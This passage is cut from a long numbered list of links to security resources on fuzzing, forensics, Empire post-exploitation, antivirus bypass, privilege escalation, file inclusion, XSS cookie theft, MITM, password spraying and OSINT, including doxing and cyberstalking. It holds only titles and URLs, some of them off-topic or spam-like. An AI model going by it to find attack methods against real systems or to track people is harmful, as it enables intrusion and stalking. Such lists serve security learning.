https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3 -1492-0x3 Python Tutorial: Fuzzer: https://www.primalsecurity.net/0x3-python-tutorial-fuzzer/ -1493-Hunting For Bugs With AFL: https://research.aurainfosec.io/hunting-for-bugs-101/ -1494-Fuzzing: The New Unit Testing: https://www.slideshare.net/DmitryVyukov/fuzzing-the-new-unit-testing -1495-Fuzzing With Peach Framework: https://www.terminatio.org/fuzzing-peach-framework-full-tutorial-download/ -1496-How we found a tcpdump vulnerability using cloud fuzzing: https://www.softscheck.com/en/identifying-security-vulnerabilities-with-cloud-fuzzing/ -1497-Finding a Fuzzer: Peach Fuzzer vs. Sulley: https://medium.com/@jtpereyda/finding-a-fuzzer-peach-fuzzer-vs-sulley-1fcd6baebfd4 -1498-Android malware analysis: https://www.slideshare.net/rossja/android-malware-analysis-71109948 -1499-15+ Malware Analysis Tools & Techniques : https://www.template.net/business/tools/malware-analysis/ -1500-30 Online Malware Analysis Sandboxes / Static Analyzers: https://medium.com/@su13ym4n/15-online-sandboxes-for-malware-analysis-f8885ecb8a35 -1501-Linux Command Line Forensics and Intrusion Detection Cheat Sheet: https://www.sandflysecurity.com/blog/compromised-linux-cheat-sheet/ -1502-Cheat Sheets - SANS Digital Forensics: https://digital-forensics.sans.org/community/cheat-sheets -1503-Breach detection with Linux filesystem forensics: https://opensource.com/article/18/4/linux-filesystem-forensics -1504-Digital Forensics Cheat Sheets Collection : https://neverendingsecurity.wordpress.com/digital-forensics-cheat-sheets-collection/ -1505-Security Incident Survey Cheat Sheet for Server Administrators: https://zeltser.com/security-incident-survey-cheat-sheet/ -1506-Digital forensics: A cheat sheet : https://www.techrepublic.com/article/digital-forensics-the-smart-persons-guide/ -1507-Windows Registry Forensics using 'RegRipper' Command-Line on Linux: https://www.pinterest.cl/pin/794815034207804059/ -1508-Windows IR Live Forensics Cheat Sheet: https://www.cheatography.com/koriley/cheat-sheets/windows-ir-live-forensics/ -1509-10 Best Known Forensics Tools That Works on Linux: https://linoxide.com/linux-how-to/forensics-tools-linux/ -1510-Top 20 Free Digital Forensic Investigation Tools for SysAdmins: https://techtalk.gfi.com/top-20-free-digital-forensic-investigation-tools-for-sysadmins/ -1511-Windows Volatile Memory Acquisition & Forensics 2018: https://medium.com/@lucideus/windows-volatile-memory-acquisition-forensics-2018-lucideus-forensics-3f297d0e5bfd -1512-PowerShell Cheat Sheet : https://www.digitalforensics.com/blog/powershell-cheat-sheet-2/ -1513-Forensic Artifacts: evidences of program execution on Windows systems: https://www.andreafortuna.org/forensic-artifacts-evidences-of-program-execution-on-windows-systems -1514-How to install a CPU?: https://www.computer-hardware-explained.com/how-to-install-a-cpu.html -1515-How To Upgrade and Install a New CPU or Motherboard: https://www.howtogeek.com/.../how-to-upgrade-and-install-a-new-cpu-or-motherboard-or-both -1516-Installing and Troubleshooting CPUs: www.pearsonitcertification.com/articles/article.aspx?p=1681054&seqNum=2 -1517-15 FREE Pastebin Alternatives You Can Use Right Away: https://www.rootreport.com/pastebin-alternatives/ -1518-Basic computer troubleshooting steps: https://www.computerhope.com/basic.htm -1519-18 Best Websites to Learn Computer Troubleshooting and Tech support: http://transcosmos.co.uk/best-websites-to-learn-computer-troubleshooting-and-tech-support -1520-Post Exploitation with PowerShell Empire 2.3.0 : https://www.yeahhub.com/post-exploitation-powershell-empire-2-3-0-detailed-tutorial/ -1521-Windows Persistence with PowerShell Empire : https://www.hackingarticles.in/windows-persistence-with-powershell-empire/ -1522-powershell-empire-tutorials-empire-to-meterpreter-shellcode-injection-ssl-tutorial: https://www.dudeworks.com/powershell-empire-tutorials-empire-to-meterpreter-shellcode-injection-ssl-tutorial -1523-Bypassing Anti-Virtus & Hacking Windows 10 Using Empire : https://zsecurity.org/bypassing-anti-virtus-hacking-windows-10-using-empire/ -1524-Hacking with Empire – PowerShell Post-Exploitation Agent : https://www.prodefence.org/hacking-with-empire-powershell-post-exploitation-agent/ -1525-Hacking Windows Active Directory Full guide: www.kalitut.com/hacking-windows-active-directory-full.html -1526-PowerShell Empire for Post-Exploitation: https://www.hackingloops.com/powershell-empire/ -1527-Generate A One-Liner – Welcome To LinuxPhilosophy!: linuxphilosophy.com/rtfm/more/empire/generate-a-one-liner/ -1528-CrackMapExec - Ultimate Guide: https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/ -1529-PowerShell Logging and Security: https://www.secjuice.com/enterprise-powershell-protection-logging/ -1530-Create your own FUD Backdoors with Empire: http://blog.extremehacking.org/blog/2016/08/25/create-fud-backdoors-empire/ -1531-PowerShell Empire Complete Tutorial For Beginners: https://video.hacking.reviews/2019/06/powershell-empire-complete-tutorial-for.html -1532-Bash Bunny: Windows Remote Shell using Metasploit & PowerShell: https://cyberarms.wordpress.com/.../bash-bunny-windows-remote-shell-using-metasploit-powershell -1533-Kerberoasting - Stealing Service Account Credentials: https://www.scip.ch/en/?labs.20181011 -1534-Automating Mimikatz with Empire and DeathStar : https://blog.stealthbits.com/automating-mimikatz-with-empire-and-deathstar/ -1535-Windows oneliners to get shell : https://ironhackers.es/en/cheatsheet/comandos-en-windows-para-obtener-shell/ -1536-ObfuscatedEmpire : https://cobbr.io/ObfuscatedEmpire.html -1537-Pentesting with PowerShell in six steps: https://periciacomputacional.com/pentesting-with-powershell-in-six-steps/ -1538-Using Credentials to Own Windows Boxes - Part 3 (WMI and WinRM): https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm -1539-PowerShell Security Best Practices: https://www.digitalshadows.com/blog-and-research/powershell-security-best-practices/ -1540-You can detect PowerShell attacks: https://www.slideshare.net/Hackerhurricane/you-can-detect-powershell-attacks -1541-Detecting and Preventing PowerShell Attacks: https://www.eventsentry.com/.../powershell-pw3rh311-detecting-preventing-powershell-attacks -1542-Detecting Offensive PowerShell Attack Tools – Active Directory Security: https://adsecurity.org/?p=2604 -1543-An Internal Pentest Audit Against Active Directory: https://www.exploit-db.com/docs/46019 -1544-A complete Active Directory Penetration Testing Checklist : https://gbhackers.com/active-directory-penetration-testing-checklist/ -1545-Active Directory | Penetration Testing Lab: https://pentestlab.blog/tag/active-directory/ -1546-Building and Attacking an Active Directory lab with PowerShell : https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell -1547-Penetration Testing in Windows Server Active Directory using Metasploit: https://www.hackingarticles.in/penetration-testing-windows-server-active-directory-using-metasploit-part-1 -1548-Red Team Penetration Testing – Going All the Way (Part 2 of 3) : https://www.anitian.com/red-team-testing-going-all-the-way-part2/ -1549-Penetration Testing Active Directory, Part II: https://www.jishuwen.com/d/2Mtq -1550-Gaining Domain Admin from Outside Active Directory: https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html -1551-Post Exploitation Cheat Sheet: https://0xsecurity.com/blog/some-hacking-techniques/post-exploitation-cheat-sheet -1552-Windows post-exploitation : https://github.com/emilyanncr/Windows-Post-Exploitation -1553-OSCP - Windows Post Exploitation : https://hackingandsecurity.blogspot.com/2017/9/oscp-windows-post-exploitation.html -1554-Windows Post-Exploitation Command List: http://pentest.tonyng.net/windows-post-exploitation-command-list/ -1555-Windows Post-Exploitation Command List: http://tim3warri0r.blogspot.com/2012/09/windows-post-exploitation-command-list.html -1556-Linux Post-Exploitation · OSCP - Useful Resources: https://backdoorshell.gitbooks.io/oscp-useful-links/content/linux-post-exploitation.html -1557-Pentesting Cheatsheet: https://anhtai.me/pentesting-cheatsheet/ -1558-Pentesting Cheatsheets - Red Teaming Experiments: https://ired.team/offensive-security-experiments/offensive-security-cheetsheets -1559-OSCP Goldmine: http://0xc0ffee.io/blog/OSCP-Goldmine -1560-Linux Post Exploitation Cheat Sheet: http://red-orbita.com/?p=8455 -1562-OSCP useful resources and tools: https://acknak.fr/en/articles/oscp-tools/ -1563-Windows Post-Exploitation Command List : https://es.scribd.com/document/100182787/Windows-Post-Exploitation-Command-List -1564-Metasploit Cheat Sheet: https://pentesttools.net/metasploit-cheat-sheet/ -1565-Windows Privilege Escalation: https://awansec.com/windows-priv-esc.html -1566-Linux Unix Bsd Post Exploitation: https://attackerkb.com/Unix/LinuxUnixBSD_Post_Exploitation -1567-Privilege Escalation & Post-Exploitation: https://movaxbx.ru/2018/09/16/privilege-escalation-post-exploitation/ -1568-Metasploit Cheat Sheet: https://vk-intel.org/2016/12/28/metasploit-cheat-sheet/ -1569-Metasploit Cheat Sheet : https://nitesculucian.github.io/2018/12/01/metasploit-cheat-sheet/ -1570-Privilege escalation: Linux: https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux -1571-Cheat Sheets — Amethyst Security: https://www.ssddcyber.com/cheatsheets -1572-Responder - CheatSheet: https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/ -1573-Cheatsheets: https://h4ck.co/wp-content/uploads/2018/06/cheatsheet.txt -1574-Are you ready for OSCP?: https://www.hacktoday.io/t/are-you-ready-for-oscp/59 -1575-Windows Privilege Escalation: https://labs.p64cyber.com/windows-privilege-escalation/ -1576-A guide to Linux Privilege Escalation: https://payatu.com/guide-linux-privilege-escalation/ -1577-Windows Post-Exploitation-Cheat-Sheet: http://pentestpanther.com/2019/07/01/windows-post-exploitation-cheat-sheet/ -1578-Windows Privilege Escalation (privesc) Resources: https://www.willchatham.com/security/windows-privilege-escalation-privesc-resources/ -1579-Dissecting Mobile Malware: https://slideplayer.com/slide/3434519/ -1580-Android malware analysis with Radare: Dissecting the Triada Trojan: www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triad/ -1581-Dissecting Mobile Native Code Packers: https://blog.zimperium.com/dissecting-mobile-native-code-packers-case-study/ -1582-What is Mobile Malware? Defined, Explained, and Explored: https://www.forcepoint.com/cyber-edu/mobile-malware -1583-Malware Development — Professionalization of an Ancient Art: https://medium.com/scip/malware-development-professionalization-of-an-ancient-art-4dfb3f10f34b -1584-Weaponizing Malware Code Sharing with Cythereal MAGIC: https://medium.com/@arun_73782/cythereal-magic-e68b0c943b1d -1585-Web App Pentest Cheat Sheet: https://medium.com/@muratkaraoz/web-app-pentest-cheat-sheet-c17394af773 -1586-The USB Threat is [Still] Real — Pentest Tools for Sysadmins, Continued: https://medium.com/@jeremy.trinka/the-usb-threat-is-still-real-pentest-tools-for-sysadmins-continued-88560af447bf -1587-How to Run An External Pentest: https://medium.com/@_jayhill/how-to-run-an-external-pentest-dd76ed14bb6a -1588-Advice for new pentesters: https://medium.com/@PentesterLab/advice-for-new-pentesters-a5f7d75a3aea -1589-NodeJS Application Pentest Tips: https://medium.com/bugbountywriteup/nodejs-application-pentest-tips-improper-uri-handling-in-express-390b3a07cb3e -1590-How to combine Pentesting with Automation to improve your security: https://medium.com/how-to-combine-pentest-with-automation-to-improve-your-security -1591-Day 79: FTP Pentest Guide: https://medium.com/@int0x33/day-79-ftp-pentest-guide-5106967bd50a -1592-SigintOS: A Wireless Pentest Distro Review: https://medium.com/@tomac/sigintos-a-wireless-pentest-distro-review-a7ea93ee8f8b -1593-Conducting an IoT Pentest : https://medium.com/p/6fa573ac6668?source=user_profile... -1594-Efficient way to pentest Android Chat Applications: https://medium.com/android-tamer/efficient-way-to-pentest-android-chat-applications-46221d8a040f -1595-APT2 - Automated PenTest Toolkit : https://medium.com/media/f1cf43d92a17d5c4c6e2e572133bfeed/href -1596-Pentest Tools and Distros: https://medium.com/hacker-toolbelt/pentest-tools-and-distros-9d738d83f82d -1597-Keeping notes during a pentest/security assessment/code review: https://blog.pentesterlab.com/keeping-notes-during-a-pentest-security-assessment-code-review-7e6db8091a66?gi=4c290731e24b -1598-An intro to pentesting an Android phone: https://medium.com/@tnvo/an-intro-to-pentesting-an-android-phone-464ec4860f39 -1599-The Penetration Testing Report: https://medium.com/@mtrdesign/the-penetration-testing-report-38a0a0b25cf2 -1600-VA vs Pentest: https://medium.com/@play.threepetsirikul/va-vs-pentest-cybersecurity-2a17250d5e03 -1601-Pentest: Hacking WPA2 WiFi using Aircrack on Kali Linux: https://medium.com/@digitalmunition/pentest-hacking-wpa2-wifi-using-aircrack-on-kali-linux-99519fee946f -1602-Pentesting Ethereum dApps: https://medium.com/@brandonarvanaghi/pentesting-ethereum-dapps-2a84c8dfee19 -1603-Android pentest lab in a nutshell : https://medium.com/@dortz/android-pentest-lab-in-a-nutshell-ee60be8638d3 -1604-Pentest Magazine: Web Scraping with Python : https://medium.com/@heavenraiza/web-scraping-with-python-170145fd90d3 -1605-Pentesting iOS apps without jailbreak: https://medium.com/securing/pentesting-ios-apps-without-jailbreak-91809d23f64e -1606-OSCP/Pen Testing Resources: https://medium.com/@sdgeek/oscp-pen-testing-resources-271e9e570d45 -1607-Web Application Security & Bug Bounty (Methodology, Reconnaissance, Vulnerabilities, Reporting): https://blog.usejournal.com/web-application-security-bug-bounty-methodology-reconnaissance-vulnerabilities-reporting-635073cddcf2?gi=4a578db171dc -1608-Local File Inclusion (LFI) — Web Application Penetration Testing: https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601 -1609-Local File Inclusion (Basic): https://medium.com/@kamransaifullah786/local-file-inclusion-basic-242669a7af3 -1610-PHP File Inclusion Vulnerability: https://www.immuniweb.com/vulnerability/php-file-inclusion.html -1611-Local File Inclusion: https://teambi0s.gitlab.io/bi0s-wiki/web/lfi/ -1612-Web Application Penetration Testing: Local File Inclusion: https://hakin9.org/web-application-penetration-testing-local-file-inclusion-lfi-testing/ -1613-From Local File Inclusion to Code Execution : https://resources.infosecinstitute.com/local-file-inclusion-code-execution/ -1614-RFI / LFI: https://security.radware.com/ddos-knowledge-center/DDoSPedia/rfi-lfi/ -1615-From Local File Inclusion to Remote Code Execution - Part 2: https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2 -1616-Local File Inclusion: https://xapax.gitbooks.io/security/content/local_file_inclusion.html -1617-Beginner Guide to File Inclusion Attack (LFI/RFI) : https://www.hackingarticles.in/beginner-guide-file-inclusion-attack-lfirfi/ -1618-LFI / RFI: https://secf00tprint.github.io/blog/payload-tester/lfirfi/en -1619-LFI and RFI Attacks - All You Need to Know: https://www.getastra.com/blog/your-guide-to-defending-against-lfi-and-rfi-attacks/ -1620-Log Poisoning - LFI to RCE : http://liberty-shell.com/sec/2018/05/19/poisoning/ -1621-LFI: https://www.slideshare.net/cyber-punk/lfi-63050678 -1622-Hand Guide To Local File Inclusion(LFI): www.securityidiots.com/Web-Pentest/LFI/guide-to-lfi.html -1623-Local File Inclusion (LFI) - Cheat Sheet: https://ironhackers.es/herramientas/lfi-cheat-sheet/ -1624-Web Application Penetration Testing Local File Inclusion (LFI): https://www.cnblogs.com/Primzahl/p/6258149.html -1625-File Inclusion Vulnerability Prevention: https://www.pivotpointsecurity.com/blog/file-inclusion-vulnerabilities/ -1626-The Most In-depth Hacker's Guide: https://books.google.com/books?isbn=1329727681 -1627-Hacking Essentials: The Beginner's Guide To Ethical Hacking: https://books.google.com/books?id=e6CHDwAAQBAJ -1628-Web App Hacking, Part 11: Local File Inclusion: https://www.hackers-arise.com/.../Web-App-Hacking-Part-11-Local-File-Inclusion-LFI -1629-Local and remote file inclusion : https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/lfi-rfi -1630-Upgrade from LFI to RCE via PHP Sessions : https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/ -1631-CVV #1: Local File Inclusion: https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a -1632-(PDF) Cross Site Scripting (XSS) in Action: https://www.researchgate.net/publication/241757130_Cross_Site_Scripting_XSS_in_Action -1633-XSS exploitation part 1: www.securityidiots.com/Web-Pentest/XSS/xss-exploitation-series-part-1.html -1634-Weaponizing self-xss: https://silentbreaksecurity.com/weaponizing-self-xss/ -1635-Cookie Tracking and Stealing using Cross-Site Scripting: https://www.geeksforgeeks.org/cookie-tracking-stealing-using-cross-site-scripting/ -1636-Defense against the Black Arts: https://books.google.com/books?isbn=1439821224 -1637-CSRF Attacks: Anatomy, Prevention, and XSRF Tokens: https://www.acunetix.com/websitesecurity/csrf-attacks/ -1638-Bypassing CSRF protection: https://www.bugbountynotes.com/training/tutorial?id=5 -1639-Stealing CSRF tokens with XSS: https://digi.ninja/blog/xss_steal_csrf_token.php -1640-Same Origin Policy and ways to Bypass: https://medium.com/@minosagap/same-origin-policy-and-ways-to-bypass-250effdc4a12 -1641-Bypassing Same Origin Policy : https://resources.infosecinstitute.com/bypassing-same-origin-policy-sop/ -1642-Client-Side Attack - an overview : https://www.sciencedirect.com/topics/computer-science/client-side-attack -1643-Client-Side Injection Attacks: https://blog.alertlogic.com/blog/client-side-injection-attacks/ -1645-The Client-Side Battle Against JavaScript Attacks Is Already Here: https://medium.com/swlh/the-client-side-battle-against-javascript-attacks-is-already-here-656f3602c1f2 -1646-Why Let’s Encrypt is a really, really, really bad idea: https://medium.com/swlh/why-lets-encrypt-is-a-really-really-really-bad-idea-d69308887801 -1647-Huge Guide to Client-Side Attacks: https://www.notion.so/d382649cfebd4c5da202677b6cad1d40 -1648-OSCP Prep – Episode 11: Client Side Attacks: https://kentosec.com/2018/09/02/oscp-prep-episode-11-client-side-attacks/ -1649-Client side attack - AV Evasion: https://rafalharazinski.gitbook.io/security/oscp/untitled-1/client-side-attack -1650-Client-Side Attack With Metasploit (Part 4): https://thehiddenwiki.pw/blog/2018/07/23/client-side-attack-metasploit/ -1651-Ransomware: Latest Developments and How to Defend Against Them: https://www.recordedfuture.com/latest-ransomware-attacks/ -1652-Cookie Tracking and Stealing using Cross-Site Scripting: https://www.geeksforgeeks.org/cookie-tracking-stealing-using-cross-site-scripting/ -1653-How to Write an XSS Cookie Stealer in JavaScript to Steal Passwords: https://null-byte.wonderhowto.com/.../write-xss-cookie-stealer-javascript-steal-passwords-0180833 -1654-How I was able to steal cookies via stored XSS in one of the famous e-commerce site: https://medium.com/@bhavarth33/how-i-was-able-to-steal-cookies-via-stored-xss-in-one-of-the-famous-e-commerce-site-3de8ab94437d -1655-Steal victim's cookie using Cross Site Scripting (XSS) : https://securityonline.info/steal-victims-cookie-using-cross-site-scripting-xss/ -1656-Remote Code Execution — Damn Vulnerable Web Application(DVWA) - Medium level security: https://medium.com/@mikewaals/remote-code-execution-damn-vulnerable-web-application-dvwa-medium-level-security-ca283cda3e86 -1657-Remote Command Execution: https://hacksland.net/remote-command-execution/ -1658-DevOops — An XML External Entity (XXE) HackTheBox Walkthrough: https://medium.com/bugbountywriteup/devoops-an-xml-external-entity-xxe-hackthebox-walkthrough-fb5ba03aaaa2 -1659-XML External Entity - Beyond /etc/passwd (For Fun & Profit): https://www.blackhillsinfosec.com/xml-external-entity-beyond-etcpasswd-fun-profit/ -1660-XXE - ZeroSec - Adventures In Information Security: https://blog.zsec.uk/out-of-band-xxe-2/ -1661-Exploitation: XML External Entity (XXE) Injection: https://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection -1662-Hack The Box: DevOops: https://redteamtutorials.com/2018/11/11/hack-the-box-devoops/ -1663-Web Application Penetration Testing Notes: https://techvomit.net/web-application-penetration-testing-notes/ -1664-WriteUp – Aragog (HackTheBox) : https://ironhackers.es/en/writeups/writeup-aragog-hackthebox/ -1665-Linux Privilege Escalation Using PATH Variable: https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/ -1666-Linux Privilege Escalation via Automated Script : https://www.hackingarticles.in/linux-privilege-escalation-via-automated-script/ -1667-Privilege Escalation - Linux : https://chryzsh.gitbooks.io/pentestbook/privilege_escalation_-_linux.html -1668-Linux Privilege Escalation: https://percussiveelbow.github.io/linux-privesc/ -1669-Perform Local Privilege Escalation Using a Linux Kernel Exploit : https://null-byte.wonderhowto.com/how-to/perform-local-privilege-escalation-using-linux-kernel-exploit-0186317/ -1670-Linux Privilege Escalation With Kernel Exploit: https://www.yeahhub.com/linux-privilege-escalation-with-kernel-exploit-8572-c/ -1671-Reach the root! How to gain privileges in Linux: https://hackmag.com/security/reach-the-root/ -1672-Enumeration for Linux Privilege Escalation: https://0x00sec.org/t/enumeration-for-linux-privilege-escalation/1959 -1673-Linux Privilege Escalation Scripts : https://netsec.ws/?p=309 -1674-Understanding Privilege Escalation: www.admin-magazine.com/Articles/Understanding-Privilege-Escalation -1675-Toppo:1 | Vulnhub Walkthrough: https://medium.com/egghunter/toppo-1-vulnhub-walkthrough-c5f05358cf7d -1676-Privilege Escalation resources: https://forum.hackthebox.eu/discussion/1243/privilege-escalation-resources -1678-OSCP Notes – Privilege Escalation (Linux): https://securism.wordpress.com/oscp-notes-privilege-escalation-linux/ -1679-Udev Exploit Allows Local Privilege Escalation : www.madirish.net/370 -1680-Understanding Linux Privilege Escalation and Defending Against It: https://linux-audit.com/understanding-linux-privilege-escalation-and-defending-againt-it -1681-Windows Privilege Escalation Using PowerShell: https://hacknpentest.com/windows-privilege-escalation-using-powershell/ -1682-Privilege Escalation | Azeria Labs: https://azeria-labs.com/privilege-escalation/ -1683-Abusing SUDO (Linux Privilege Escalation): https://touhidshaikh.com/blog/?p=790 -1684-Privilege Escalation - Linux: https://mysecurityjournal.blogspot.com/p/privilege-escalation-linux.html -1685-0day Linux Escalation Privilege Exploit Collection : https://blog.spentera.id/0day-linux-escalation-privilege-exploit-collection/ -1686-Linux for Pentester: cp Privilege Escalation : https://hackin.co/articles/linux-for-pentester-cp-privilege-escalation.html -1687-Practical Privilege Escalation Using Meterpreter: https://ethicalhackingblog.com/practical-privilege-escalation-using-meterpreter/ -1688-dirty_sock: Linux Privilege Escalation (via snapd): https://www.redpacketsecurity.com/dirty_sock-linux-privilege-escalation-via-snapd/ -1689-Linux privilege escalation: https://jok3rsecurity.com/linux-privilege-escalation/ -1690-The Complete Meterpreter Guide | Privilege Escalation & Clearing Tracks: https://hsploit.com/the-complete-meterpreter-guide-privilege-escalation-clearing-tracks/ -1691-How to prepare for PWK/OSCP, a noob-friendly guide: https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob -1692-Basic Linux privilege escalation by kernel exploits: https://greysec.net/showthread.php?tid=1355 -1693-Linux mount without root : epaymentamerica.com/tozkwje/xlvkawj2.php?trjsef=linux-mount-without-root -1694-Linux Privilege Escalation Oscp: www.condadorealty.com/2h442/linux-privilege-escalation-oscp.html -1695-Privilege Escalation Attack Tutorial: https://alhilalgroup.info/photography/privilege-escalation-attack-tutorial -1696-Oscp Bethany Privilege Escalation: https://ilustrado.com.br/i8v7/7ogf.php?veac=oscp-bethany-privilege-escalation -1697-Hacking a Website and Gaining Root Access using Dirty COW Exploit: https://ethicalhackers.club/hacking-website-gaining-root-access-using-dirtycow-exploit/ -1698-Privilege Escalation - Linux · Total OSCP Guide: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html -1699-Linux advanced privilege escalation: https://www.slideshare.net/JameelNabbo/linux-advanced-privilege-escalation -1700-Local Linux privilege escalation overview: https://myexperiments.io/linux-privilege-escalation.html -1701-Windows Privilege Escalation Scripts & Techniques : https://medium.com/@rahmatnurfauzi/windows-privilege-escalation-scripts-techniques-30fa37bd194 -1702-Penetration Testing: Maintaining Access: https://resources.infosecinstitute.com/penetration-testing-maintaining-access/ -1703-Kali Linux Maintaining Access : https://www.tutorialspoint.com/kali_linux/kali_linux_maintaining_access.htm -1704-Best Open Source Tools for Maintaining Access & Tunneling: https://n0where.net/maintaining-access -1705-Maintaining Access Part 1: Introduction and Metasploit Example: https://www.hackingloops.com/maintaining-access-metasploit/ -1706-Maintaining Access - Ethical hacking and penetration testing: https://miloserdov.org/?cat=143 -1707-Maintaining Access with Web Backdoors [Weevely]: https://www.yeahhub.com/maintaining-access-web-backdoors-weevely/ -1708-Best Open Source MITM Tools: Sniffing & Spoofing: https://n0where.net/mitm-tools -1709-Cain and Abel - Man in the Middle (MITM) Attack Tool Explained: https://cybersguards.com/cain-and-abel-man-in-the-middle-mitm-attack-tool-explained/ -1710-Man In The Middle Attack (MITM): https://medium.com/@nancyjohn.../man-in-the-middle-attack-mitm-114b53b2d987 -1711-Real-World Man-in-the-Middle (MITM) Attack : https://ieeexplore.ieee.org/document/8500082 -1712-The Ultimate Guide to Man in the Middle Attacks : https://doubleoctopus.com/blog/the-ultimate-guide-to-man-in-the-middle-mitm-attacks-and-how-to-prevent-them/ -1713-How to Conduct ARP Spoofing for MITM Attacks: https://tutorialedge.net/security/arp-spoofing-for-mitm-attack-tutorial/ -1714-How To Do A Man-in-the-Middle Attack Using ARP Spoofing & Poisoning: https://medium.com/secjuice/man-in-the-middle-attack-using-arp-spoofing-fa13af4f4633 -1715-Ettercap and middle-attacks tutorial : https://pentestmag.com/ettercap-tutorial-for-windows/ -1716-How To Setup A Man In The Middle Attack Using ARP Poisoning: https://online-it.nu/how-to-setup-a-man-in-the-middle-attack-using-arp-poisoning/ -1717-Intro to Wireshark and Man in the Middle Attacks: https://www.commonlounge.com/discussion/2627e25558924f3fbb6e03f8f912a12d -1718-MiTM Attack with Ettercap: https://www.hackers-arise.com/single-post/2017/08/28/MiTM-Attack-with-Ettercap -1719-Man in the Middle Attack with Websploit Framework: https://www.yeahhub.com/man-middle-attack-websploit-framework/ -1720-SSH MitM Downgrade : https://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade -1721-How to use Netcat for Listening, Banner Grabbing and Transferring Files: https://www.yeahhub.com/use-netcat-listening-banner-grabbing-transferring-files/ -1722-Powershell port scanner and banner grabber: https://www.linkedin.com/pulse/powershell-port-scanner-banner-grabber-jeremy-martin/ -1723-What is banner grabbing attack: https://rxkjftu.ga/sport/what-is-banner-grabbing-attack.php -1724-Network penetration testing: https://guif.re/networkpentest -1725-NMAP Cheatsheet: https://redteamtutorials.com/2018/10/14/nmap-cheatsheet/ -1726-How To Scan a Network With Nmap: https://online-it.nu/how-to-scan-a-network-with-nmap/ -1727-Hacking Metasploitable : Scanning and Banner grabbing: https://hackercool.com/2015/11/hacking-metasploitable-scanning-banner-grabbing/ -1728-Penetration Testing of an FTP Server: https://shahmeeramir.com/penetration-testing-of-an-ftp-server-19afe538be4b -1729-Nmap Usage & Cheet-Sheet: https://aerroweb.wordpress.com/2018/03/14/namp-cheat-sheet/ -1730-Discovering SSH Host Keys with NMAP: https://mwhubbard.blogspot.com/2015/03/discovering-ssh-host-keys-with-nmap.html -1731-Banner Grabbing using Nmap & NetCat - Detailed Explanation: https://techincidents.com/banner-grabbing-using-nmap-netcat -1732-Nmap – (Vulnerability Discovery): https://crazybulletctfwriteups.wordpress.com/2015/09/5/nmap-vulnerability-discovery/ -1733-Penetration Testing on MYSQL (Port 3306): https://www.hackingarticles.in/penetration-testing-on-mysql-port-3306/ -1774-Password Spraying - Infosec Resources : https://resources.infosecinstitute.com/password-spraying/ -1775-Password Spraying- Common mistakes and how to avoid them: https://medium.com/@adam.toscher/password-spraying-common-mistakes-and-how-to-avoid-them-3fd16b1a352b -1776-Password Spraying Tutorial: https://attack.stealthbits.com/password-spraying-tutorial-defense -1777-password spraying Archives: https://www.blackhillsinfosec.com/tag/password-spraying/ -1778-The 21 Best Email Finding Tools:: https://beamery.com/blog/find-email-addresses -1779-OSINT Primer: People (Part 2): https://0xpatrik.com/osint-people/ -1780-Discovering Hidden Email Gateways with OSINT Techniques: https://blog.ironbastion.com.au/discovering-hidden-email-servers-with-osint-part-2/ -1781-Top 20 Data Reconnaissance and Intel Gathering Tools : https://securitytrails.com/blog/top-20-intel-tools -1782-101+ OSINT Resources for Investigators [2019]: https://i-sight.com/resources/101-osint-resources-for-investigators/ -1783-Digging Through Someones Past Using OSINT: https://nullsweep.com/digging-through-someones-past-using-osint/ -1784-Gathering Open Source Intelligence: https://posts.specterops.io/gathering-open-source-intelligence-bee58de48e05 -1785-How to Locate the Person Behind an Email Address: https://www.sourcecon.com/how-to-locate-the-person-behind-an-email-address/ -1786-Find hacked email addresses and check breach mails: https://www.securitynewspaper.com/2019/01/16/find-hacked-email-addresses/ -1787-A Pentester's Guide - Part 3 (OSINT, Breach Dumps, & Password : https://delta.navisec.io/osint-for-pentesters-part-3-password-spraying-methodology/ -1788-Top 10 OSINT Tools/Sources for Security Folks: www.snoopysecurity.github.io/osint/2018/08/02/10_OSINT_for_security_folks.html -1789-Top 5 Open Source OSINT Tools for a Penetration Tester: https://www.breachlock.com/top-5-open-source-osint-tools/ -1790-Open Source Intelligence tools for social media: my own list: https://www.andreafortuna.org/2017/03/20/open-source-intelligence-tools-for-social-media-my-own-list/ -1791-Red Teaming: I can see you! Insights from an InfoSec expert : https://www.perspectiverisk.com/i-can-see-you-osint/ -1792-OSINT Playbook for Recruiters: https://amazinghiring.com/osint-playbook/ -1793- Links for Doxing, Personal OSInt, Profiling, Footprinting, Cyberstalking: https://www.irongeek.com/i.php?page=security/doxing-footprinting-cyberstalking -1794-Open Source Intelligence Gathering 201 (Covering 12 additional techniques): https://blog.appsecco.com/open-source-intelligence-gathering-201-covering-12-additional-techniques-b76417b5a544?gi=2afe435c630a -1795-Online Investigative Tools for Social Media Discovery and Locating People: https://4thetruth.info/colorado-private-investigator-online-detective-social-media-and-online-people-search-online-search-tools.html -1796-Expanding Skype Forensics with OSINT: Email Accounts: http://www.automatingosint.com/blog/2016/05/expanding-skype-forensics-with-osint-email-accounts/ -1798-2019 OSINT Guide: https://www.randhome.io/blog/2019/01/05/2019-osint-guide/ -1799-OSINT - Passive Recon and Discovery of Assets: https://0x00sec.org/t/osint-passive-recon-and-discovery-of-assets/6715 -1800-OSINT With Datasploit: https://dzone.com/articles/osint-with-datasploit -1801-Building an OSINT Reconnaissance Tool from Scratch: https://medium.com/@SundownDEV/phone-number-scanning-osint-recon-tool-6ad8f0cac27b -1802-Find 